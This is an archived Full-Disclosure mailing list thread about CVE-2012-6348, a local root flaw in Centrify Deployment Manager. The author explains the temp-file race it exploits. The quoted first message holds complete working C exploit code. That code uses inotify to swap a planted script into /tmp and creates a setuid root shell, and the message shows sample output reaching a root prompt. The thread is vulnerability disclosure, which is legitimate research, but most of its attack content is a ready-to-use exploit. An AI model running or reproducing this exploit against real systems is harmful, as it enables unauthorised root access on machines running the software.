lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-id: <25b94e33-d07e-4432-b9f7-041f818e1890@me.com>
Date: Fri, 04 Jan 2013 21:58:43 +0000 (GMT)
From: "Larry W. Cashdollar" <larry0@...com>
To: Alexander Georgiev <alexander.georgiev@...oo.de>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Local root exploit for Centrify Deployment
 Manager < v2.1.0.283 local root

Hi Alexander,

Sorry for the late response.

Yes, exactly. I create the file centrify.cmd.0 before they echo into it so I own it, then wait for them to change
the permissions on the file (this occurs after they overwrite it with their shell script) to copy my malicious code
in place.  They then execute the file with dzdo.

-- Larry

On Dec 19, 2012, at 05:27 AM, Alexander Georgiev <alexander.georgiev@...oo.de> wrote:

> Could you explain me how it works? It looks like you create a file, which will be chown'd to root by the system, right?
>
>
>
> Am 18.12.2012 21:56, schrieb Larry W. Cashdollar:
>> These guys were really cool about it, probably one of the best vendor responses I've gotten.  I am seeing if
>> I can go to the next iteration of training. =-> 
>>
>> On Dec 18, 2012, at 12:51 PM, Jeffrey Walton <noloader@...il.com> wrote:
>>
>>> I've got a feeling you will not be sent to anymore vendor classes :)
>>>
>>> On Tue, Dec 18, 2012 at 3:49 PM, Larry W. Cashdollar <larry0@...com> wrote:
>>> > /*Local root exploit for Centrify Deployment Manager v2.1.0.283 local root,
>>> > Centrify released a fix very quickly - nice vendor response.
>>> >
>>> > http://vapid.dhs.org/exploits/centrify_local_r00t.c
>>> >
>>> > CVE-2012-6348 12/17/2012
>>> > http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html
>>> > Greetings vladz, Thanks for the inotify & syscall technique.
>>> >
>>> > This exploit based on http://vladz.devzero.fr/010_bzexe-vuln.php
>>> >
>>> > Run the exploit and wait for administrator to analyse or deploysoftware
>>> > to the system.
>>> >
>>> > larry@h0g:~/code/exploit$ ./cent_root centrify.cmd.0
>>> > [*] Launching attack against "centrify.cmd.0"
>>> > [+] Creating evil script (/tmp/evil)
>>> > [+] Creating target file (/bin/touch /tmp/centrify.cmd.0)
>>> > [+] Initialize inotify
>>> > [+] Waiting for root to launch "centrify.cmd.0"
>>> > [+] Opening root shell (/tmp/sh)
>>> > #
>>> >
>>> > Larry W. Cashdollar
>>> > @_larry0
>>> > */
>>> >
>>> >
>>> > #include <stdlib.h>
>>> > #include <stdio.h>
>>> > #include <unistd.h>
>>> > #include <sys/stat.h>
>>> > #include <sys/types.h>
>>> > #include <string.h>
>>> > #include <sys/inotify.h>
>>> > #include <fcntl.h>
>>> > #include <sys/syscall.h>
>>> >
>>> > /*Create a small c program to pop us a root shell*/
>>> > int create_nasty_shell(char *file) {
>>> > char *s = "#!/bin/bash\n"
>>> > "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
>>> > "cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
>>> > "chmod 4755 /tmp/sh;\n";
>>> >
>>> > int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
>>> > write(fd, s, strlen(s));
>>> > close(fd);
>>> >
>>> > return 0;
>>> > }
>>> >
>>> >
>>> > int main(int argc, char **argv) {
>>> > int fd, wd;
>>> > char buf[1], *targetpath, *cmd,
>>> > *evilsh = "/tmp/evil", *trash = "/tmp/trash";
>>> >
>>> > if (argc < 2) {
>>> > printf("Usage: %s <target file> \n", argv[0]);
>>> > return 1;
>>> > }
>>> >
>>> > printf("[*] Launching attack against \"%s\"\n", argv[1]);
>>> >
>>> > printf("[+] Creating evil script (/tmp/evil)\n");
>>> > create_nasty_shell(evilsh);
>>> >
>>> > targetpath = malloc(sizeof(argv[1]) + 6);
>>> > cmd = malloc(sizeof(char) * 32);
>>> > sprintf(targetpath, "/tmp/%s", argv[1]);
>>> > sprintf(cmd,"/bin/touch %s",targetpath);
>>> > printf("[+] Creating target file (%s)\n",cmd);
>>> > system(cmd);
>>> >
>>> > printf("[+] Initialize inotify\n");
>>> > fd = inotify_init();
>>> > wd = inotify_add_watch(fd, targetpath, IN_ATTRIB);
>>> >
>>> > printf("[+] Waiting for root to change perms on \"%s\"\n", argv[1]);
>>> > syscall(SYS_read, fd, buf, 1);
>>> > syscall(SYS_rename, targetpath, trash);
>>> > syscall(SYS_rename, evilsh, targetpath);
>>> >
>>> > inotify_rm_watch(fd, wd);
>>> >
>>> > printf("[+] Opening root shell (/tmp/sh)\n");
>>> > sleep(2);
>>> > system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
>>> >
>>> > return 0;
>>> > }
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>  
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>  
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ